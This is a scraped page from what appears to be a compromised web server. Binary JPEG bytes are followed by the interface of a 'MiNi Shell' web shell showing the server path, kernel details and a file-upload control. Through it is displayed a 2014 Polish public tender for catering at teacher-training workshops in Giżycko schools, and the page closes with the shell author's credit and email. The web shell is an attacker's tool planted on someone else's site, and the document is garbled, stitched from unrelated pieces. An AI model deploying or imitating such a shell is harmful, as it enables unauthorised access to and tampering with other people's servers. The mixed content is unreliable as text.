JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141031/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141031/229703-N-2014.html

<p class="kh_header"><b>Giżycko: Realizacja usługi cateringu podczas  doskonalenia nauczycieli w ramach projektu 
pn. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim</b><br>
<b>Numer ogłoszenia: 229703 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych , ul. Smętka 7, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 9434, faks 87 428 4565.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pzosipo.gizycko.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usługi cateringu podczas  doskonalenia nauczycieli w ramach projektu 
pn. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja usługi cateringu podczas dwudniowych warsztatów (Część I) oraz wykładów i konsultacji (Część II) w ramach doskonalenia nauczycieli będących członkami Rad Pedagogicznych w 45 placówkach oświatowych położonych na terenie powiatu giżyckiego.
2.	Usługą są objęci uczestnicy projektu - nauczyciele, eksperci oraz pracownicy SORE. 
3.	Usługi objęte zamówieniem są częścią projektu pt. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Priorytetu III. Wysoka jakość systemu oświaty, Działania 3.5. Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki.
4.	Realizacja usługi będzie odbywała się od 12 listopada 2014r. do 30 czerwca 2015. Zamawiający poinformuje Wykonawcę o miejscu i terminie dostarczenia posiłków oraz liczbie osób biorących udział w danym spotkaniu z dwudniowym wyprzedzeniem.
5.	Obowiązki Wykonawcy: 
Posiłki w formie drugiego dania winny być gorące i gotowe do spożycia. Przygotowane, dostarczone i podane posiłki będą świeże, pierwszej jakości,
Wykonawca zapewni sztućce do spożycia posiłków.
Posiłki powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny wygląd. Wykonawca przy oferowaniu obiadów uwzględniać będzie świeże produkty.
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia.
Zapewnienie transportu posiłków, którego wartość wliczy w cenę jednostkową posiłku.
Sporządzenie protokołu odbioru usługi w danej placówce - według wzoru przekazanego przez Zamawiającego;
przechowanie dokumentów związanych realizacją zamówienia w tym także dokumentów finansowych nie krócej niż do 31.12.2020 r.
6.	Zamawiający zastrzega sobie prawo do oceny, jakości realizowanej usługi przez Wykonawcę. Kontrolę będą przeprowadzały osoby wyznaczone przez Zamawiającego w tym Personel Projektu.
7.	W przypadku stwierdzenia przy odbiorze posiłków braków jakościowych lub ilościowych świadczonych usług, Zamawiającemu przysługiwać będzie prawo obniżenia wynagrodzenia bądź rozwiązania umowy z tytułu realizowanej usługi przez Wykonawcę.
8.	Zamawiający przewiduje, że Wynagrodzenie wykonawcy wypłacane będzie nie częściej niż dwa razy w miesiącu po zrealizowaniu usług na podstawie dostarczonych przez Wykonawcę faktur/rachunków wraz z protokołami odbioru posiłków podpisanymi przez osobę upoważnioną przez Zamawiającego.
9.	Planowana liczba uczestników oraz miejsce realizacji usługi:

Przedszkole BAJKA
Miejsce wykonania usługi: ul. Wodociągowa 15, Giżycko
Przewidywana liczba uczestników zajęć: 17 osób + 1 ekspert 

Przedszkola Niepublicznego Koralik 
Miejsce wykonania usługi: ul. Daszyńskiego 14
Przewidywana liczba uczestników zajęć: 7 osób + ekspert

Przedszkole Samorządowe przy Zespole Placówek Oświatowych w Miłkach 
Miejsce wykonania usługi: ul. Szkolna 1a, Miłki
Przewidywana liczba uczestników zajęć: 5 osób + ekspert.

Szkoła Podstawowa w Rydzewie 
Miejsce wykonania usługi: ul. Mazurska 94, Rydzewo
Przewidywana liczba uczestników zajęć: 8 osób + ekspert.

Szkoła Podstawowa w Staświnach 
Miejsce wykonania usługi: Staświny 27
Przewidywana liczba uczestników zajęć: 11 osób + ekspert.

Zespół Szkół Elektronicznych i Informatycznych w Giżycku 
Miejsce wykonania usługi: ul. Mickiewicza 27, Giżycko
Przewidywana liczba uczestników zajęć: 42 osób + 2 ekspertów.

Przedszkole Miejskie Nr 1 z oddziałem integracyjnym 
Miejsce wykonania usługi: ul. Drzymały 9, Giżycko
Przewidywana liczba uczestników zajęć: 16 osób + ekspert.

Przedszkole Miejskiego Nr 4 
Miejsce wykonania usługi: ul. Jagiełły 3, Giżycko
Przewidywana liczba uczestników zajęć: 17 osób + ekspert.

Szkoła Podstawowa nr 4
Miejsce wykonania usługi: ul. 3 Maja 21, Giżycko
Przewidywana liczba uczestników zajęć: 41 osób + 2 ekspertów.

Szkoła Podstawowa nr 6 
Miejsce wykonania usługi: ul. Pionierska 13, Giżycko
Przewidywana liczba uczestników zajęć: 20 osób + ekspert.

Szkoła Podstawowa nr 7 
Miejsce wykonania usługi: ul. Wodociągowa 8, Giżycko
Przewidywana liczba uczestników zajęć: 47 osób + 2 ekspertów.

Szkoła Podstawowa nr 3 z oddziałem integracyjnym w Zespole Szkół Nr 1 w Giżycku 
Miejsce wykonania usługi: ul. Wiejska 50, Giżycko
Przewidywana liczba uczestników zajęć: 20 osób + ekspert.

Gimnazjum nr 1 im. Jana Pawła II w Giżycku 
Miejsce wykonania usługi: ul. Gimnazjalna 1, Giżycko
Przewidywana liczba uczestników zajęć: 21 osób + ekspert.

Gimnazjum nr 2 
Miejsce wykonania usługi: ul. Warszawska 39, Giżycko
Przewidywana liczba uczestników zajęć: 20 osób + 1 ekspert

Gimnazjum Nr 3 przy Zespole Szkół nr 1 
Miejsce wykonania usługi: ul. Wiejska 50, Giżycko
Przewidywana liczba uczestników zajęć: 23 osoby + ekspert.

Szkoła Podstawowa w Wilkasach
Miejsce wykonania usługi: ul. Szkolna 8, Wilkasy 
Przewidywana liczba uczestników zajęć: 25 osób + ekspert.

Szkoła Podstawowa w Bystrym 
Miejsce wykonania usługi: Bystry 8a, koło Giżycka
Przewidywana liczba uczestników zajęć: 12 osób + ekspert.

Szkoła Podstawowa w Upałtach 
Miejsce wykonania usługi: Upałty 11
Przewidywana liczba uczestników zajęć: 10 osób + ekspert.

Szkoła Podstawowa w Spytkowie 
Miejsce wykonania usługi: Spytkowo 41
Przewidywana liczba uczestników zajęć: 11 osób + ekspert.

Gimnazjum Wilkasy 
Miejsce wykonania usługi: ul. Olsztyńska 29, Wilkasy
Przewidywana liczba uczestników zajęć: 16 osób + ekspert.

Gimnazjum Bystry 
Miejsce wykonania usługi: Bystry 1i
Przewidywana liczba uczestników zajęć: 9 osób + ekspert.

Szkoła Podstawowa w Kruklankach 
Miejsce wykonania usługi: ul. 22-ego Lipca 34, Kruklanki
Przewidywana liczba uczestników zajęć: 11 osób + ekspert.

Szkoła Podstawowa w Boćwince 
Miejsce wykonania usługi: Boćwinka 12
Przewidywana liczba uczestników zajęć: 11 osób + ekspert.

Gimnazjum w Kruklankach 
Miejsce wykonania usługi: ul. 22-ego Lipca 34, Kruklanki
Przewidywana liczba uczestników zajęć: 17 osób + ekspert.

Punk Wychowania Przedszkolnego Mały Artysta w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 36, Wydminy
Przewidywana liczba uczestników zajęć: 6 osób + ekspert.

Szkoła Podstawowa w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 94, Wydminy
Przewidywana liczba uczestników zajęć: 25 osób + ekspert.

Szkoła Podstawowa w Gawlikach Wielkich 
Miejsce wykonania usługi: Gawliki Wielkie 32
Przewidywana liczba uczestników zajęć: 8 osób + ekspert.

Szkoła Podstawowa w Talkach  
Miejsce wykonania usługi: Talki 2
Przewidywana liczba uczestników zajęć: 9 osób + ekspert.

Szkoła Podstawowa w Zelkach 
Miejsce wykonania usługi: Zelki 1
Przewidywana liczba uczestników zajęć: 8 osób + ekspert.

Gimnazjum przy Zespole Szkół Ogólnokształcących w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 94
Przewidywana liczba uczestników zajęć: 19 osób + ekspert.

Gimnazjum przy Zespole Szkół w Gawlikach Wielkich 
Miejsce wykonania usługi: Gawliki Wielkie 32
Przewidywana liczba uczestników zajęć: 8 osób + ekspert.

Szkoła Podstawowa przy Zespole Placówek Oświatowych w Miłki 
Miejsce wykonania usługi: ul. Szkolna 1a, Miłki
Przewidywana liczba uczestników zajęć: 10 osób + ekspert.

Gimnazjum w Miłkach
Miejsce wykonania usługi: ul. Szkolna 3, Miłki
Przewidywana liczba uczestników zajęć: 11 osób + ekspert.

Przedszkole w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 7 osób + ekspert.

Szkoła Podstawowa w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 22 osób + ekspert.

Gimnazjum w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 16 osób + ekspert.

Zasadnicza Szkoła Zawodowa nr 2 (ZSZ) 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 16, Giżycko
Przewidywana liczba uczestników zajęć: 14 osób + ekspert.

Technikum nr 3 (ZSZ) 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 16, Giżycko
Przewidywana liczba uczestników zajęć: 16 osób + ekspert.

Zespół Szkół Kształtowania Środowiska i Agrobiznesu 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 23, Giżycko
Przewidywana liczba uczestników zajęć: 48 osób + 2 ekspertów.

I Liceum Ogólnokształcące w Giżycku
Miejsce wykonania usługi: ul. Traugutta 1, Giżycko
Przewidywana liczba uczestników zajęć: 29 osób + 2 ekspertów.

II Liceum Ogólnokształcące w Giżycku  
Miejsce wykonania usługi: ul. Sikorskiego 3, Giżycko
Przewidywana liczba uczestników zajęć: 28 osób + 2 ekspertów

Liceum Ogólnokształcące przy ZDZ (dla młodzieży)
Miejsce wykonania usługi: ul. Kopernika 5, Giżycko
Przewidywana liczba uczestników zajęć: 5 osób + ekspert.

Technikum przy ZDZ 
Miejsce wykonania usługi: ul. Kopernika 5, Giżycko
Przewidywana liczba uczestników zajęć: 5 osób + ekspert.

Przedszkole Krasnal Miejsce wykonania usługi: ul. Kolejowa 10, Giżycko
Liczba grup: 1
Przewidywana liczba uczestników zajęć: 9 osób + ekspert

Przedszkole Promyk 
Miejsce wykonywania usługi: ul. Smętka 22, Giżycko
Liczba grup: 1
Przewidywana liczba uczestników zajęć: 5 osób 

Zamawiający zastrzega, iż realizacja posiłków może odbywać się jednego dnia w różnych miejscach (dla różnych jednostek). Wykonawca przewidzi w/w okoliczność w wycenie zamówienia.

Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną część lub na dwie części.

CZĘŚĆ I 
Usługa cateringowa na każdy dzień odbywających się dwudniowych warsztatów ma polegać na zapewnieniu w miejscu ich realizacji:
- przerwy kawowej,
- przerwy obiadowej.
	
W ramach poszczególnych posiłków Wykonawca musi zapewnić dla każdej osoby uczestniczącej w warsztatach: 

Podczas przerwy kawowej: 
1 sztukę pieczywa słodkiego (np. bułeczka drożdżowa, rogalik, jagodzianka, pączek), 
kawę rozpuszczalną - 10gram, 
1 saszetkę herbaty, 
1 saszetkę herbaty owocowej,
2 śmietanki do kawy - 10ml
cukier - 20 gram
ciastka (2 rodzaje) - 100 gram

Podczas przerwy obiadowej:
posiłek w formie drugiego dania, w tym.: 
- porcja mięsna/rybna(co najmniej 150 gram) 
- ziemniaki lub inny dodatek węglowodanowy, 
- surówka

Posiłek nie może się powtarzać dla tej samej grupy następnego dnia; 
-butelkę wody mineralnej niegazowanej o pojemności 0,5 l.
-butelkę wody mineralnej gazowanej o pojemności 0,5 l.
- soki 0,5 l na osobę

Łączna liczba przewidywanych posiłków na warsztatach 1592 szt.

CZĘŚĆ II
Usługa cateringowa na każdy dzień wykładów i konsultacji (4 spotkania w każdej placówce) ma polegać na zapewnieniu w miejscu ich realizacji przerwy obiadowej.
W ramach pojedynczego posiłku określonego jako przerwa obiadowa Wykonawca musi zapewnić dla każdej osoby  uczestniczącej: 
-posiłek w formie drugiego dania, w tym.: porcja mięsna/rybna (co najmniej 150 gram), ziemniaki lub inny dodatek węglowodanowy, surówka- Posiłek nie może się powtarzać dla tej samej grupy; 
-butelkę wody mineralnej niegazowanej o pojemności 0,5 l.
- butelkę wody mineralnej gazowanej o pojemności 0,5 l.
- 1 sztukę pieczywa słodkiego (np. bułeczka drożdżowa, rogalik, jagodzianka, pączek), 
- kawę rozpuszczalną - 10gram, 
- 1 saszetkę herbaty,
- 1 saszetkę herbaty owocowej, 
- 2 śmietanki do kawy - 10ml.
- cukier -  20 gram.
	
Łączna liczba przewidywanych posiłków : 3184 szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 12.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony i podpisany Formularz Oferty - Załącznik nr 1 do SIWZ;
b)	Oświadczenie o akceptacji warunków umowy - Załącznik nr 3 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie, związane z liczbą posiłków dostarczonych przez Wykonawcę w ramach usługi cateringu - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pzosipo.gizycko.edu.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych w Giżycku 
ul. Smętka 7                                                                                           
11-500 Giżycko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2014 godzina 09:00, miejsce: Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych w Giżycku 
ul. Smętka 7                                                                                           
11-500 Giżycko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 3.	Usługi objęte zamówieniem są częścią projektu pt. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Priorytetu III. Wysoka jakość systemu oświaty, Działania 3.5. Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com